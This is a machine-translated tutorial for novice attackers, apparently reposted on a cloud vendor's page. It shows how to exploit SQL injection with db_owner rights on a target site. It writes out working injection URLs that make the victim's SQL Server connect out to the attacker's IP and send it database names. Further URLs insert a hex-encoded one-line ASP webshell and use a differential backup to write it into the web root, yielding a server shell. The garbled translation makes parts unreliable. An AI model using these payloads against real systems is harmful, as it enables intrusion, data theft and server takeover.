The idea of encountering db_owner in the injection process (figure) _ Vulnerability Research

Source: Internet
Author: User
Tags create database
First of all, the article is written to the rookie friend to see

. Now inject the horizontal fly! A lot of tools, the past hand-injected era has ceased to exist! Instead of NBSI hdsi D injection Tools. And so on. is also the majority of rookie's favorite. Even if there is nothing. Don't know anything. Just a few mouse clicks. The password for the site with the injected vulnerability comes out. The next step is sweeping the background. It's all over. If you have access to the SA permission, you can open 3389 or upload webshell. If you _owner permissions, consider using backup differences. But what about the Web and the database not on the same server? In fact, it is not necessarily uncertain. In addition to the registry to start the key to write a DOS command, let the target server boot up, but there are limitations. The user must be authorized to master this library. It is very rare for administrators to do this. So hopefully it's very small. Look at Figure 1


DB permissions. List the directory to see if the data is in a piece with the Web. If you are in a piece, consider the backup difference. But it's a pity. The web directory was not found. As shown in Figure 2

Javascript:resizepic (This) border=0>

This is the use of MSSQL's xp_dirtree storage process to read the path. Then write the results of the temporary table. The previous NBSI did not have this function. The side-dishes door had to sweep the SA. Get the backstage stuff. Later, NBSI added treelist functions. You can list directories to make it easier to view the directory structure. Then the smelly Beggar's developed the Getwebshell only then makes this function life light, inserts the horse into the database, The database is then backed up as an ASP file. Line is feasible. But if the database is too big. Dozens of M Webshell you say it works? Xiaolu backups are pretty good. reduce file size. Make a differential backup. But back to the original point. The data and the Web are not in a piece ...

Actually. Even if the database and the Web are not in a piece of the opportunity to do. Not to mention a chance. General server installed system or something. Would you like to install IIS? Set him a C-plate. See if there is any inetpub this directory. I knew he had no IIS installed. But I don't know his IP too? What do we do? You can do this and ping the Web server. Sweep him the 1433-port of section C. See which one is open. Now many hosts have firewalls enabled. 1433 port even if it's open you can't sweep it. You can use the OPENDATASOURCE macro to make each other's SQL connect to your own database. Now that you can establish a connection, you can get the IP address of the database server. Let's try it out. First of all, you have to have a public network IP. And open 1433 ports are guaranteed to be accessible to the extranet. Good. Content. Just start doing it!

I'm doing this station now. 100% data and the Web are not in one piece. But I see the Inetpub folder from C disk. Explains that the database server has IIS installed. But he can't get his IP. It's easy to do it with the method described above. First, build a library on this machine first. Open Query Analyzer input
Create DATABASE hack520 Create TABLE zhu (name nvarchar (256) null); CREATE TABLE J8 (id int null,name nvarchar (256) NULL); Point execution. As shown in Figure 4

Javascript:resizepic (This) border=0>


Set up a hack520 library name. And Zhu J8 two tables. Zhu has a name in this field. J8 also put two field names. One is ID and one is name. OK, now you're ready to start the connection. ~~~~~~~ first look at this SQL statement insert INTO OpenDataSource (' SQLOLEDB ', ' server= your ip;uid=sql user; pwd=sql password; database= established library name '). Table name ' executed statement ' Well, let's start now ...

http://www.xxx.com/news.asp?id=126 ' Insert%20into%20opendatasource (' SQLOLEDB ', ' server=219.149.xx.182;uid=sa;pwd =hack520!@ #77169;d atabase=hack520 '). hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

Execute on IE. oh this time the other side will be connected to my machine SQL Server. No, believe it. Netstat-an look at the ~ Figure 5

Javascript:resizepic (This) border=0>

haha already connected. Now the database server IP knows. And the database server is open 80 again. What now? Bak a Webshell up. Known web directory C:\Inetpub\wwwroot. Okay, let's go.
Http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar (4000) Select @a=db_name (), @s= 0x737339323238 Backup Database @a to disk=@s--back up the current library

http://www.xxx.com/news.asp?id=126;D ROP table [hack520];create table [dbo]. [hack520] ([cmd] [image])--Build a table

http://www.xxx.com/news.asp?id=126insert into hack520 (cmd) VALUES ( 0x3c2565786563757465207265717565737428226c2229253e)--insert blue screen Trojan

http://www.xxx.com/news.asp?id=126;d eclare @a sysname,@s varchar (4000) Select @a=db_name (), @s= 0x433a5c496e65747075625c777777726f6f745c7a68752e617370 Backup Database @a to disk=@s with differential,format-- Get Webshell http://221.216xxx.xx/zhu.asp again with a differential backup

The next step is to connect it with a blue-screen Trojan client. This is simple. I don't have much to say here. The shell of the Web server is not available. But at least not empty-handed. Got the shell of the database server.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.